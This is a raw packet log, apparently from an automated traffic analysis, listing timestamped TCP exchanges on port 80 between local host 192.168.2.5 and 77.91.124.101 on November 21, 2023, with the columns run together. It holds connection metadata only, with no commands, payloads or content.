                                                            Nov 21, 2023 04:48:28.519516945 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.519596100 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.519782066 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.592457056 CET804980877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.592679977 CET804980877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.592916012 CET4980880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.718632936 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.718663931 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.718990088 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.789834976 CET804980877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.794825077 CET804980877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.838129997 CET4980880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.917680025 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.917696953 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.922313929 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.963129044 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.038387060 CET4980880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.038536072 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.038937092 CET4981080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.235243082 CET804980877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.235399008 CET4980880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.236490011 CET804981077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.236583948 CET4981080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.236812115 CET4981080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.237035036 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.237090111 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.434448957 CET804981077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.434954882 CET804981077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.435201883 CET4981080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.632966995 CET804981077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.632982016 CET804981077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.637830973 CET804981077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.681958914 CET4981080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.758577108 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.957474947 CET804981177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.957566023 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.957750082 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.160239935 CET804981177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.160639048 CET804981177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.160854101 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.365766048 CET804981177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.369224072 CET804981177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.416368008 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.492539883 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.493103981 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.689537048 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.689660072 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.689914942 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.691181898 CET804981177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.691279888 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.886113882 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.886128902 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.886403084 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.082734108 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.082748890 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.087574005 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.135288954 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.209783077 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.210203886 CET4981380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.405956984 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.406043053 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.408806086 CET804981377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.408900976 CET4981380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.409105062 CET4981380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.607850075 CET804981377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.608257055 CET804981377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.608489990 CET4981380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.807269096 CET804981377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.807281971 CET804981377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.811938047 CET804981377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.853758097 CET4981380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.962426901 CET4981380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.962810040 CET4981480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:32.167170048 CET804981377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:32.167196035 CET804981477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:32.167282104 CET4981380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:32.167325020 CET4981480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:32.308875084 CET4981480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:32.505289078 CET804981477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:32.505321980 CET804981477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:32.505526066 CET4981480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:32.702007055 CET804981477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:32.702023983 CET804981477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:32.706655025 CET804981477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:32.760021925 CET4981480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:33.933142900 CET4981580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.058931112 CET4981080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.059096098 CET4981680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.131025076 CET804981577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.131128073 CET4981580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.131325960 CET4981580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.258646011 CET804981677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.258750916 CET4981680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.258927107 CET4981680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.329159021 CET804981577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.329173088 CET804981577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.329386950 CET4981580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.459597111 CET804981677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.459631920 CET804981677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.459961891 CET4981680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.527193069 CET804981577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.532227993 CET804981577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.588138103 CET4981580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.659542084 CET804981677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.659559011 CET804981677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.664002895 CET804981677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.713234901 CET4981680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.793386936 CET4981580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.793387890 CET4981480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.793543100 CET4981680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.794087887 CET4981780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.997332096 CET804981477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.997419119 CET4981480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.997665882 CET804981677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.997747898 CET4981680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.998115063 CET804981577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.998167038 CET804981777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:34.998171091 CET4981580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.998261929 CET4981780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:34.998446941 CET4981780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:35.196366072 CET804981777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:35.196516037 CET804981777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:35.196736097 CET4981780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:35.394537926 CET804981777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:35.394552946 CET804981777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:35.399066925 CET804981777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:35.447559118 CET4981780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:35.523739100 CET4981880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:35.722191095 CET804981877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:35.722275019 CET4981880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:35.722460985 CET4981880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:35.920552969 CET804981877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:35.920638084 CET804981877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:35.921303988 CET4981880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:36.119642019 CET804981877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:36.119663000 CET804981877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:36.124488115 CET804981877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:36.166507959 CET4981880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:36.252326012 CET4981880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:36.252918005 CET4981980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:36.454070091 CET804981977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:36.454166889 CET4981980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:36.454344034 CET4981980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:36.454624891 CET804981877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:36.454682112 CET4981880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:36.651673079 CET804981977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:36.651806116 CET804981977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:36.652051926 CET4981980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:36.852642059 CET804981977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:36.852659941 CET804981977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:36.858058929 CET804981977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:36.900648117 CET4981980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:36.974996090 CET4981780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:36.975089073 CET4981980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:36.975543976 CET4982080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:37.172009945 CET804982077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:37.172204971 CET4982080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:37.172411919 CET804981977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:37.172470093 CET4981980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:37.176589012 CET4982080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:37.373009920 CET804982077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:37.373348951 CET804982077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:37.373555899 CET4982080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:37.570156097 CET804982077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:37.570183992 CET804982077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:37.576966047 CET804982077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:37.619484901 CET4982080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:37.695177078 CET4982080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:37.695583105 CET4982180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:37.891637087 CET804982077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:37.892800093 CET4982080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:37.894469023 CET804982177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:37.894572020 CET4982180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:37.894817114 CET4982180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:38.093652964 CET804982177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:38.093694925 CET804982177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:38.093915939 CET4982180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:38.292892933 CET804982177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:38.292978048 CET804982177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:38.297655106 CET804982177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:38.338172913 CET4982180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:38.414568901 CET4982180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:38.415009022 CET4982280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:38.613487005 CET804982277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:38.613576889 CET4982280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:38.613641024 CET804982177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:38.613770962 CET4982180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:38.613940001 CET4982280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:38.811878920 CET804982277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:38.811933994 CET804982277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:38.812347889 CET4982280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.010402918 CET804982277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.010421991 CET804982277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.015322924 CET804982277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.057029009 CET4982280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.139030933 CET4982280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.139538050 CET4982380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.337021112 CET804982277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.337097883 CET4982280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.338190079 CET804982377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.338260889 CET4982380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.338498116 CET4982380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.537847996 CET804982377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.537868023 CET804982377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.538080931 CET4982380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.542227983 CET4982480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.542742014 CET4982380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.694535971 CET4982580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.736845970 CET804982377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.736857891 CET804982377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.739927053 CET804982477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.739999056 CET4982480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.740168095 CET4982480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.741638899 CET804982377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.741651058 CET804982377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.741692066 CET4982380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.741709948 CET4982380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.892263889 CET804982577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.892359972 CET4982580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.892560959 CET4982580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:39.937835932 CET804982477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.937958002 CET804982477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:39.938183069 CET4982480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:40.090137005 CET804982577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:40.090172052 CET804982577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:40.090675116 CET4982580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:40.136007071 CET804982477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:40.136046886 CET804982477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:40.140853882 CET804982477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:40.182019949 CET4982480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:40.293272972 CET804982577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:40.293287039 CET804982577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:40.297071934 CET804982577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:40.338160038 CET4982580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:40.412497997 CET4982480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:40.412517071 CET4982580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:40.413054943 CET4982680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:40.610204935 CET804982577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:40.610232115 CET804982477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:40.610462904 CET4982580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:40.610462904 CET4982480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:40.610630035 CET804982677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:40.610712051 CET4982680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:40.611051083 CET4982680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:40.808861017 CET804982677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:40.808887005 CET804982677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:40.809181929 CET4982680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:41.006932020 CET804982677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:41.006951094 CET804982677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:41.011790991 CET804982677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:41.056914091 CET4982680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:41.134212971 CET4982780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:41.333054066 CET804982777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:41.333162069 CET4982780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:41.333384037 CET4982780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:41.532207012 CET804982777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:41.532224894 CET804982777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:41.532480001 CET4982780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:41.731313944 CET804982777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:41.731333971 CET804982777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:41.736088991 CET804982777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:41.775795937 CET4982780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:41.868287086 CET4982780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:41.869951963 CET4982880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:42.069951057 CET804982777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:42.070031881 CET804982877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:42.070085049 CET4982780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:42.070249081 CET4982880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:42.070585966 CET4982880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:42.268047094 CET804982877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:42.268085957 CET804982877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:42.268487930 CET4982880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:42.466064930 CET804982877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:42.466085911 CET804982877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:42.472783089 CET804982877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:42.525890112 CET4982880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:42.605051994 CET4982880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:42.605483055 CET4982980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:42.803390026 CET804982877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:42.803529978 CET4982880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:42.804369926 CET804982977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:42.804480076 CET4982980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:42.804671049 CET4982980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:43.003252029 CET804982977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:43.003443956 CET804982977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:43.004524946 CET4982980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:43.203807116 CET804982977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:43.203902006 CET804982977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:43.210524082 CET804982977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:43.260059118 CET4982980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:43.338469982 CET4982680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:43.343978882 CET4982980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:43.344630957 CET4983080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:43.542491913 CET804983077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:43.542578936 CET4983080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:43.542810917 CET4983080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:43.542886019 CET804982977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:43.542943001 CET4982980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:43.744147062 CET804983077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:43.744493961 CET804983077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:43.744719028 CET4983080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:43.943164110 CET804983077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:43.943185091 CET804983077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:43.947633028 CET804983077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:43.994431973 CET4983080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:44.068773985 CET4983080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:44.069171906 CET4983180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:44.269365072 CET804983077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:44.269427061 CET4983080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:44.269639969 CET804983177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:44.269714117 CET4983180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:44.269886017 CET4983180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:44.469590902 CET804983177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:44.469629049 CET804983177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:44.470208883 CET4983180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:44.671385050 CET804983177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:44.671408892 CET804983177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:44.675368071 CET804983177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:44.728840113 CET4983180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:44.806813002 CET4983180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:44.807379961 CET4983280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.005835056 CET804983277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.006036997 CET4983280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.006190062 CET804983177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.006195068 CET4983280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.006253958 CET4983180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.151293039 CET4983280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.151808977 CET4983380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.203874111 CET804983277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.203978062 CET804983277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.204041004 CET4983280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.273627043 CET4983480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.353135109 CET804983377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.353271008 CET4983380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.353457928 CET4983380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.355977058 CET804983277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.355990887 CET804983277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.356028080 CET4983280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.356061935 CET4983280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.470093012 CET804983477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.470176935 CET4983480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.470352888 CET4983480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.552839041 CET804983377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.553359032 CET804983377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.553590059 CET4983380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.666929960 CET804983477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.667021990 CET804983477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.667335033 CET4983480192.168.2.577.91.124.101
